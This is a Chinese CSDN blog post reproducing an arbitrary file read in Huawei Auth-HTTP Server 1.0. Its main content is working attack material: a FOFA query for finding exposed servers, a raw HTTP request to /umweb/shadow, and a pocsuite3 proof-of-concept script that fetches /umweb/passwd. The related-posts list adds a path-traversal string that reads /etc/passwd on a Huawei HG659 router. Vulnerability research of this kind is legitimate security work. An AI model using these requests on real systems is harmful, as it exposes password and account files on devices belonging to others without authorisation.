漏洞复现-华为Auth-HTTP服务器任意文件读取漏洞(附漏洞检测脚本)

最新推荐文章于 2023-12-29 16:10:39 发布
最新推荐文章于 2023-12-29 16:10:39 发布
阅读量2.1k 收藏 14
点赞数 15
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jjjj1029056414/article/details/134934001
版权

免责声明

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

漏洞描述

华为Auth-Http Server 1.0存在任意文件读取,攻击者可通过该漏洞读取任意文件。

fofa语句

server="Huawei Auth-Http Server 1.0"

poc语句加检测

GET /umweb/shadow HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

poc脚本

脚本用的pocsuite框架

# _*_ coding:utf-8 _*_
# @Time : 2023/12/11 17:51
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str

class huawei_Auth_http_fileread(POCBase):
    pocDesc = '''华为Auth-Http Serve任意文件读取漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2023-12-11'
    name = '华为Auth-Http Serve任意文件读取漏洞'



    def _verify(self):

        result = {}
        url = self.url+ '/umweb/passwd'
        headers = {
            'Te': 'trailers',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
            'Sec-Fetch-Site': 'none',
            'Sec-Fetch-Mode': 'navigate',
            'Sec-Fetch-User': '?1',
            'Sec-Fetch-Dest': 'document',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Connection': 'keep-alive',
            'Sec-Ch-Ua': '"Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"',
            'Sec-Ch-Ua-Mobile': '?0',
            'Sec-Ch-Ua-Platform': '"Windows"'
        }
        try:
            response = requests.get(url, headers=headers)
            if response.status_code == 200 and 'root' in response.text:
                result['VerifyInfo'] = {}

            return self.parse_output(result)


        except Exception as e:
            pass

register_poc(huawei_Auth_http_fileread)

脚本利用

炼金术师诸葛亮
关注
  • 15
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
华为 Auth-HTTP Server 1.0 任意文件读取漏洞复现 [POC]
薛定谔嘚喵博客
12-12 1123
华为 Auth-HTTP Server 1.0 是华为公司提供的一种身份验证及授权解决方案。它是一个基于HTTP协议的身份认证服务器,旨在为企业网络和系统提供安全的访问控制服务。该服务存在任意文件读取漏洞
Huawei Auth-HTTP Server 1.0 任意文件读取
最新发布
weixin_43567873的博客
03-09 142
Huawei Auth-HTTP Server 1.0 任意文件读取
Huawei Auth-Http Server 1.0 passwd文件泄露漏洞POC
07-05
-u 指定单个url -l 指定url文件 先用fofa脚本爬取所有Huawei Auth-Http相关资产(fofa脚本下载地址:) python3 fofa-cwillchris.py -k body="umweb/u20.png" 然后用此脚本 ./poc.bin -l url.txt
华为Auth-Http Serve任意文件读取
zkaqlaoniao的博客
11-09 2643
华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件
漏洞复现--Huawei-Auth-HTTP-任意文件读取
qq_53003652的博客
12-22 1268
Huawei Auth-HTTP Server 1.0 是华为公司提供的一种身份验证及授权解决方案。它是一个基于HTTP协议的身份认证服务器,旨在为企业网络和系统提供安全的访问控制服务。该产品存在任意文件读取漏洞
behavioral-auth:行为认证 Chrome 插件
06-09
行为认证 行为认证 Chrome 插件 此扩展程序建立、跟踪和检测用户配置文件的异常更改
漏洞复现华为Auth-Http服务文件读取漏洞
晚风不及你
12-18 1989
Huawei Auth-HTTP Server 1.0 可以实现基于角色的访问控制,通过用户的身份认证和权限控制,确保只有经过授权的用户可以访问特定的资源和服务。它支持常见的身份认证协议和技术,如LDAP、RADIUS、TACACS+等,能够与企业现有的认证系统无缝集成,提供一致的认证体验。
Huawei Auth-Http Server 1.0 passwd文件泄露漏洞
Cwillchris的博客
07-05 2412
/Huawei-Auth-Http-Server1.0passwd文件泄露.bin -l 1.txt (将上面爬取到的文件(一般是final****.txt)移动到脚本目录下,保存为1.txt。先用fofa脚本爬取所有碧海威相关资产(
华为Auth-HTTP服务器任意文件读取漏洞处理
黄树茂博客
12-29 1486
处理方式:关闭web-authentication服务。华为防火墙认证服务漏洞
华为Auth-HTTP服务器任意文件读取漏洞
fly夏天的博客
12-27 2449
文章复现华为auth-http服务器任意文件读取漏洞并提供了简单的利用方法
Huawei Auth-HTTP Server 1.0 存在任意文件读取漏洞 POC软件
nnn2188185的博客
12-12 1028
Huawei Auth-HTTP Server 1.0 是华为公司提供的一种身份验证及授权解决方案。它是一个基于HTTP协议的身份认证服务器,旨在为企业网络和系统提供安全的访问控制服务。
auth-server-demo:Spring授权服务器0.1.0 && Spring Boot 2.4.2
05-12
授权码认证 curl --location --request GET ' http://localhost:3000/oauth2/authorize?client_id=pig&client_secret=pig&response_type=code&redirect_uri=http://localhost:8080/renren-admin/sys/oauth2-sso ' 获取令牌 curl --location --request POST ' http://localhost:3000/oauth2/token ' \ --header ' Authorization: Basic cGlnOnBpZw== ' \ --header ' Content-Type: application/x-www-form-urlencoded ' \ --data-urlencode '
HCIA-Datacom V1.0
03-15
HCIA-Datacom 实验室搭建指南V1.0.pdf 708 kB 2022/3/15 15:43:22 HCIA-Datacom V1.0 考试大纲.pdf 211 kB 2022/3/15 14:47:45 HCIA-Datacom V1.0 培训教材.pdf 117 MB 2022/3/15 14:55:53 HCIA-Datacom V1.0 实验手册.pdf 2.4 MB 2022/3/15 14:56:06
AZ华为OLT命令助手 For MA5680T.zip
01-06
AZ华为OLT命令助手 For MA5680T 本软件内置了功能强大的脚本生成功能,可快速开局并批量注册认证光猫,专为了管理华为OLT MA5680T而开发。 1:内置了常用的48条命令的使用示例,从此不用记复杂的命令 2:命令的参数...
漏洞复现----16、mini_httpd任意文件读取漏洞(CVE-2018-18778)
七天
11-01 1412
文章目录一、mini_httpd简介二、漏洞简介三、漏洞复现 一、mini_httpd简介 mini_httpd是一台小型 HTTP 服务器。其性能不是很好,但对于低或中等流量的网站,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 它实现了 HTTP 服务器的所有基本功能,包括: GET、HEAD和POST方法;
HTTP AUTH验证
热门推荐
李余通的博客
11-27 1万+
何为http auth?http auth是一种基础的用户验证,原理是将用户名:密码base64加密后放在http的请求头部Authorization 发给服务器。浏览器的做法当你访问一个需要http auth验证的资源时,web server会去检查你的http请求头并且比对帐号密码,如果不成功就会相应的所请求的资源,否则就会返回401,浏览器在接收到401时会自动打开一个登陆窗口让你登陆,点击提
华为交换机consonl,http,telnet登录配置
NeverGUM的博客
05-14 1万+
Telnet: <Huawei>system-view //进入系统视图 [Huawei]sysname R //更名为R [R]telnet server enable //开启tenlnet服务 [R]user-interface vty 0 4 //进入虚拟终端接口(同时支持最大...
任意文件读取漏洞复现
来日可期的博客
08-31 2784
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
HUAWEI HG659任意文件读取漏洞
chaojixiaojingang
08-03 1074
1.漏洞描述 HUAWEI HG659 lib存在任意文件读取漏洞,攻击者可通过该漏洞读取任意文件。 2.网络资产查找 FOFA:app="HUAWEI-Home-Gateway-HG659" 3.POC /lib///....//....//....//....//....//....//....//....//etc//passwd 4.漏洞复现 1)访问HUWEI HG659页面 2)在URL后添加POC ...
huawei auth-http server 1.0
09-01
Huawei Auth-HTTP Server 1.0 是华为公司提供的一种身份验证及授权解决方案。它是一个基于HTTP协议的身份认证服务器,旨在为企业网络和系统提供安全的访问控制服务。 Huawei Auth-HTTP Server 1.0 可以实现基于角色的访问控制,通过用户的身份认证和权限控制,确保只有经过授权的用户可以访问特定的资源和服务。它支持常见的身份认证协议和技术,如LDAP、RADIUS、TACACS+等,能够与企业现有的认证系统无缝集成,提供一致的认证体验。 此外,Huawei Auth-HTTP Server 1.0 还具备安全审计与日志功能,可以记录和追踪用户的访问活动,为企业的安全风险管理提供重要的数据支持。它可以生成详细的访问日志,包括用户身份、访问时间、访问内容等信息,帮助企业了解和分析网络访问情况,及时发现异常活动和潜在的安全威胁。 Huawei Auth-HTTP Server 1.0 还提供了可视化的管理界面,管理员可以通过简单直观的操作完成用户账号的创建、配置角色权限、管理访问策略等任务,提高工作效率。同时,它支持高可用和容灾机制,能够保证身份认证和授权服务的持续可用性,降低系统故障对业务造成的影响。 总之,Huawei Auth-HTTP Server 1.0 是一款功能强大、安全可靠的身份验证和授权解决方案,能够有效保护企业的资源和网络安全,提供用户友好的身份认证体验,是企业网络安全管理中的重要工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值